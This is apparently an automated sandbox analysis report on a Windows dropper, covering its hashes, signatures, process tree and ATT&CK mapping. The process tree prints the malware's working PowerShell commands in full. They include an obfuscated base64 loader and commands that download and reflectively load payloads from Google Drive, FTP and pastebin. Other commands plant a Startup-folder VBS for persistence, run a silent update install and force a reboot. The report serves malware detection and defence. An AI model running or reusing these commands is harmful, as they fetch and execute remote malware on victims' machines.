e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711

General

Target

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
Size

504KB
MD5

8b7ed745bf0d5f0eaa43940d9cdeab37
SHA1

2916a90ce784cc380c03828dc5a15907d490be42
SHA256

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711
SHA512

c731b0688ad792e4448ce6bd882a288757a949fd1cf645a6d93b36d1a1a4689f6e7f843edb1660bf0a63774ee795e054e4d443655f7144ac4a3fa35ad1737df3
SSDEEP

12288:TLMEalqxXblqoRX5qbfphLxaOdRSRW4H4444Cbm:HqaXNabfphLxaSRSRW4H4444Cbm

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dados dos hospedes.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dados dos hospedes.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe
2848	powershell.exe
2956	powershell.exe

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files\__tmp_rar_sfx_access_check_259410568	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File created	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File opened for modification	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File opened for modification	C:\Program Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2648	powershell.exe
2848	powershell.exe
2452	powershell.exe
2956	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 2740	2236	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	30
PID 2236 wrote to memory of 2740	2236	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	30
PID 2236 wrote to memory of 2740	2236	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	30
PID 2740 wrote to memory of 2648	2740	WScript.exe	31
PID 2740 wrote to memory of 2648	2740	WScript.exe	31
PID 2740 wrote to memory of 2648	2740	WScript.exe	31
PID 2648 wrote to memory of 2848	2648	powershell.exe	33
PID 2648 wrote to memory of 2848	2648	powershell.exe	33
PID 2648 wrote to memory of 2848	2648	powershell.exe	33
PID 2848 wrote to memory of 2452	2848	powershell.exe	34
PID 2848 wrote to memory of 2452	2848	powershell.exe	34
PID 2848 wrote to memory of 2452	2848	powershell.exe	34
PID 2452 wrote to memory of 2768	2452	powershell.exe	35
PID 2452 wrote to memory of 2768	2452	powershell.exe	35
PID 2452 wrote to memory of 2768	2452	powershell.exe	35
PID 2848 wrote to memory of 2956	2848	powershell.exe	36
PID 2848 wrote to memory of 2956	2848	powershell.exe	36
PID 2848 wrote to memory of 2956	2848	powershell.exe	36

C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
"C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Dados dos hospedes.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$IvwMW = 'OwB9四いуDs四いуKQ四いуg四いуCk四いуI四いу四いуn四いуDE四いуZQB1四いуHI四いуd四いу四いуn四いуC四いу四いуL四いу四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуC四いу四いуL四いу四いуg四いуCc四いуa四いуB0四いуHQ四いуc四いуBz四いуDo四いуLw四いуv四いуH四いу四いуYQBz四いуHQ四いуYgBp四いуG4四いуLgBu四いуGU四いуd四いу四いуv四いуHI四いуYQB3四いуC8四いуMw四いуx四いуD四いу四いуO四いу四いуy四いуDQ四いуLQ四いу1四いуD四いу四いуNg四いуn四いуC四いу四いуK四いу四いуg四いуF0四いуXQBb四いуHQ四いуYwBl四いуGo四いуYgBv四いуFs四いуI四いу四いуs四いуC四いу四いуb四いуBs四いуHU四いуbg四いуk四いуC四いу四いуK四いуBl四いуGs四いуbwB2四いуG4四いуSQ四いуu四いуCk四いуI四いу四いуn四いуEk四いуVgBG四いуHI四いуc四いу四いуn四いуC四いу四いуK四いуBk四いуG8四いуa四いуB0四いуGU四いуTQB0四いуGU四いуRw四いуu四いуCk四いуJw四いуx四いуHM四いуcwBh四いуGw四いуQw四いуu四いуDM四いуeQBy四いуGE四いуcgBi四いуGk四いуT四いуBz四いуHM四いуYQBs四いуEM四いуJw四いуo四いуGU四いуc四いуB5四いуFQ四いуd四いуBl四いуEc四いуLg四いуp四いуC四いу四いуSQBv四いуH四いу四いуbQBQ四いуCQ四いуI四いу四いуo四いуGQ四いуYQBv四いуEw四いуLgBu四いуGk四いуYQBt四いуG8四いуR四いуB0四いуG4四いуZQBy四いуHI四いуdQBD四いуDo四いуOgBd四いуG4四いуaQBh四いуG0四いуbwBE四いуH四いу四いуc四いуBB四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いу7四いуCk四いуI四いу四いуp四いуC四いу四いуJwBB四いуCc四いуI四いу四いуs四いуC四いу四いуJwCTITo四いуkyEn四いуC四いу四いуK四いуBl四いуGM四いуYQBs四いуH四いу四いуZQBS四いуC4四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いуg四いуCg四いуZwBu四いуGk四いуcgB0四いуFM四いуN四いу四いу2四いуGU四いуcwBh四いуEI四いуbQBv四いуHI四いуRg四いу6四いуDo四いуXQB0四いуHI四いуZQB2四いуG4四いуbwBD四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いуg四いуD0四いуI四いуBJ四いуG8四いуc四いуBt四いуF四いу四いуJ四いу四いуg四いуF0四いуXQBb四いуGU四いуd四いуB5四いуEI四いуWw四いу7四いуCc四いуJQBJ四いуGg四いуcQBS四いуFg四いуJQ四いуn四いуC四いу四いуPQ四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуDs四いуKQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуI四いу四いуo四いуGc四いуbgBp四いуHI四いуd四いуBT四いуGQ四いуYQBv四いуGw四いуbgB3四いуG8四いуR四いу四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуC四いу四いуPQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQ四いуo四いуGU四いуcwBv四いуH四いу四いуcwBp四いуGQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いу7四いуCk四いуI四いу四いуn四いуHQ四いуe四いуB0四いуC4四いуMQ四いуw四いуEw四いуT四いуBE四いуC8四いуMQ四いуw四いуC8四いуcgBl四いуHQ四いуc四いуB5四いуHI四いуYwBw四いуFU四いуLwBy四いуGI四いуLgBt四いуG8四いуYw四いуu四いуHQ四いуYQBy四いуGI四いуdgBr四いуGM四いуcwBl四いуGQ四いуLgBw四いуHQ四いуZgB四いу四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуv四いуC8四いуOgBw四いуHQ四いуZg四いуn四いуC四いу四いуK四いуBn四いуG4四いуaQBy四いуHQ四いуUwBk四いуGE四いуbwBs四いуG4四いуdwBv四いуEQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いуg四いуD0四いуI四いуBn四いуFM四いуegBD四いуEI四いуb四いу四いуk四いуDs四いуKQ四いуn四いуE四いу四いуQ四いуBw四いуEo四いуO四いу四いу3四いуDU四いуMQ四いуy四いуG8四いуcgBw四いуHI四いуZQBw四いуG8四いуb四いуBl四いуHY四いуZQBk四いуCc四いуL四いу四いуn四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуn四いуCg四いуb四いуBh四いуGk四いуd四いуBu四いуGU四いуZ四いуBl四いуHI四いуQwBr四いуHI四いуbwB3四いуHQ四いуZQBO四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUw四いуg四いуHQ四いуYwBl四いуGo四いуYgBv四いуC0四いуdwBl四いуG4四いуI四いу四いу9四いуC四いу四いуcwBs四いуGE四いуaQB0四いуG4四いуZQBk四いуGU四いуcgBD四いуC4四いуQQB2四いуEo四いуUwBJ四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いу7四いуDI四いуMQBz四いуGw四いуV四いу四いу6四いуDo四いуXQBl四いуH四いу四いуeQBU四いуGw四いуbwBj四いуG8四いуd四いуBv四いуHI四いуU四いуB5四いуHQ四いуaQBy四いуHU四いуYwBl四いуFM四いуLgB0四いуGU四いуTg四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуb四いуBv四いуGM四いуbwB0四いуG8四いуcgBQ四いуHk四いуd四いуBp四いуHI四いуdQBj四いуGU四いуUw四いу6四いуDo四いуXQBy四いуGU四いуZwBh四いуG4四いуYQBN四いуHQ四いуbgBp四いуG8四いуU四いуBl四いуGM四いуaQB2四いуHI四いуZQBT四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуDs四いуfQBl四いуHU四いуcgB0四いуCQ四いуew四いуg四いуD0四いуI四いуBr四いуGM四いуYQBi四いуGw四いуb四いуBh四いуEM四いуbgBv四いуGk四いуd四いуBh四いуGQ四いуaQBs四いуGE四いуVgBl四いуHQ四いуYQBj四いуGk四いуZgBp四いуHQ四いуcgBl四いуEM四いуcgBl四いуHY四いуcgBl四いуFM四いуOg四いу6四いуF0四いуcgBl四いуGc四いуYQBu四いуGE四いуTQB0四いуG4四いуaQBv四いуF四いу四いуZQBj四いуGk四いуdgBy四いуGU四いуUw四いуu四いуHQ四いуZQBO四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWwB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуC四いу四いуZg四いуv四いуC四いу四いуM四いу四いуg四いуHQ四いуLw四いуg四いуHI四いуLw四いуg四いуGU四いуe四いуBl四いуC4四いуbgB3四いуG8四いуZ四いуB0四いуHU四いуa四いуBz四いуC四いу四いуOw四いуn四いуD四いу四いуO四いу四いуx四いуC四いу四いуc四いуBl四いуGU四いуb四いуBz四いуCc四いуI四いуBk四いуG4四いуYQBt四いуG0四いуbwBj四いуC0四いуI四いуBl四いуHg四いуZQ四いуu四いуGw四いуb四いуBl四いуGg四いуcwBy四いуGU四いуdwBv四いуH四いу四いуOw四いуg四いуGU四いуYwBy四いуG8四いуZg四いуt四いуC四いу四いуKQ四いуg四いуCc四いуc四いуB1四いуHQ四いуcgBh四いуHQ四いуUwBc四いуHM四いуbQBh四いуHI四いуZwBv四いуHI四いуU四いуBc四いуHU四いуbgBl四いуE0四いуI四いуB0四いуHI四いуYQB0四いуFM四いуX四いуBz四いуHc四いуbwBk四いуG4四いуaQBX四いуFw四いуd四いуBm四いуG8四いуcwBv四いуHI四いуYwBp四いуE0四いуX四いуBn四いуG4四いуaQBt四いуGE四いуbwBS四いуFw四いуYQB0四いуGE四いуR四いуBw四いуH四いу四いуQQBc四いуCc四いуI四いу四いуr四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуI四いу四いуo四いуC四いу四いуbgBv四いуGk四いуd四いуBh四いуG4四いуaQB0四いуHM四いуZQBE四いуC0四いуI四いу四いуn四いуCU四いуSQBo四いуHE四いуUgBY四いуCU四いуJw四いуg四いуG0四いуZQB0四いуEk四いуLQB5四いуH四いу四いуbwBD四いуC四いу四いуOw四いуg四いуHQ四いуcgBh四いуHQ四いуcwBl四いуHI四いуbwBu四いуC8四いуI四いуB0四いуGU四いуaQB1四いуHE四いуLw四いуg四いуFE四いуQQBq四いуHo四いуSQ四いуg四いуGU四いуe四いуBl四いуC4四いуYQBz四いуHU四いуdw四いуg四いуGU四いуe四いуBl四いуC4四いуb四いуBs四いуGU四いуa四いуBz四いуHI四いуZQB3四いуG8四いуc四いу四いуg四いуDs四いуKQ四いуn四いуHU四いуcwBt四いуC4四いуbgBp四いуHc四いуc四いуBV四いуFw四いуJw四いуg四いуCs四いуI四いуBw四いуGo四いуT四いуBq四いуE0四いуJ四いу四いуo四いуC四いу四いуPQ四いуg四いуFE四いуQQBq四いуHo四いуSQ四いу7四いуCk四いуI四いуBl四いуG0四いуYQBO四いуHI四いуZQBz四いуFU四いуOg四いу6四いуF0四いуd四いуBu四いуGU四いуbQBu四いуG8四いуcgBp四いуHY四いуbgBF四いуFs四いуI四いу四いуr四いуC四いу四いуJwBc四いуHM四いуcgBl四いуHM四いуVQBc四いуDo四いуQw四いуn四いуCg四いуI四いу四いу9四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуOw四いуp四いуCc四いуdQBz四いуG0四いуLgBu四いуGk四いуdwBw四いуFU四いуX四いу四いуn四いуC四いу四いуKw四いуg四いуH四いу四いуagBM四いуGo四いуTQ四いуk四いуC四いу四いуL四いуBC四いуEs四いуT四いуBS四いуFU四いуJ四いу四いуo四いуGU四いуb四いуBp四いуEY四いуZ四いуBh四いуG8四いуb四いуBu四いуHc四いуbwBE四いуC4四いуSQBl四いуHk四いуVgBt四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуfQ四いу7四いуC四いу四いуKQ四いуn四いуHQ四いуTwBM四いуGM四いуXwBL四いуGE四いуMwBa四いуGY四いуbwBY四いуDI四いуSgBK四いуHI四いуVgBo四いуG0四いуVg四いу5四いуGM四いуbQ四いу5四いуFg四いуcwB1四いуFg四いуbQBq四いуDE四いуZw四いуx四いуCc四いуI四いу四いуr四いуC四いу四いуU四いуBw四いуFY四いуaQBz四いуCQ四いуK四いу四いуg四いуD0四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуDs四いуI四いу四いуp四いуCc四いуMg四いу0四いуHU四いуW四いуBK四いуFQ四いуcQBh四いуG0四いуZwB5四いуE0四いуd四いуBG四いуHo四いуYQBr四いуF四いу四いуUg四いуx四いуHE四いуXwBJ四いуHY四いуRwBp四いуFg四いуTgBk四いуHE四いуYQBO四いуDE四いуJw四いуg四いуCs四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуAoACAAPQAgAFAAcABWAGkAcwAkAHsAIAApACAASgBpAHAAWABxACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABKAGkAcABYAHEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAIABlAHAAcQBVAGgAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABlAHAAcQBVAGgAJAAgADsA';$rTgKn = $IvwMW.replace('四いу' , 'A') ;$wppON = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $rTgKn ) ); $wppON = $wppON[-1..-$wppON.Length] -join '';$wppON = $wppON.replace('%XRqhI%','C:\Program Files\Dados dos hospedes.vbs');powershell $wppON
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $hUqpe = $host.Version.Major.Equals(2) ;if ( $hUqpe ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$qXpiJ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qXpiJ ) {$siVpP = ($siVpP + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$siVpP = ($siVpP + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mVyeI = (New-Object Net.WebClient);$mVyeI.Encoding = [System.Text.Encoding]::UTF8;$mVyeI.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Program Files\Dados dos hospedes.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$ISJvA.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $ISJvA.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ISJvA.dispose();$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ISJvA.DownloadString( $lBCzSg );$hzwje = 'C:\Program Files\Dados dos hospedes.vbs';[Byte[]] $PmpoI = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $PmpoI ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '605-428013/war/ten.nibtsap//:sptth' , $hzwje , 'true1' ) );};"
      4⤵
      Drops startup file
      Command and Scripting Interpreter: PowerShell
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
        5⤵
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2452
      - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        6⤵
        Drops file in Windows directory
        
        PID:2768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Dados dos hospedes.vbs

Filesize
681KB

MD5
91f673cf4f5d5b787e55304a8618a6c8

SHA1
d5c1ab75ac7b7faed860caba7df5f0cad998ef28

SHA256
c376a309893167d768244df15d8c01b335182f7d3c806d5373c4bd09367e9156

SHA512
3d0a872108ee86c2bf3dd394712b1449cdd635df369300bb80650fbfd13bf8f423c84a3a8fdbae2e6bc6cb46475bd6f8144703da85648c740bb2d0da5c548e1d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
53d4d687ce2856ccd99e8f486cc7d7c1

SHA1
7c09af38fd80a41aa91e4009925ce563be00c4e4

SHA256
f3327d4398384902ab7779f86e90d340ae64fa6a5ca86156359b94223f54d4a5

SHA512
347ec7f1af3a3a525d99f066c2fea2f80e11491a350b07d52a96707d874ecb1869eea9fd7cd6544b822124595a0c22a6c86cecba58ac9ac3e3f37af8e159639e

Download Submit
memory/2648-9-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2648-10-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing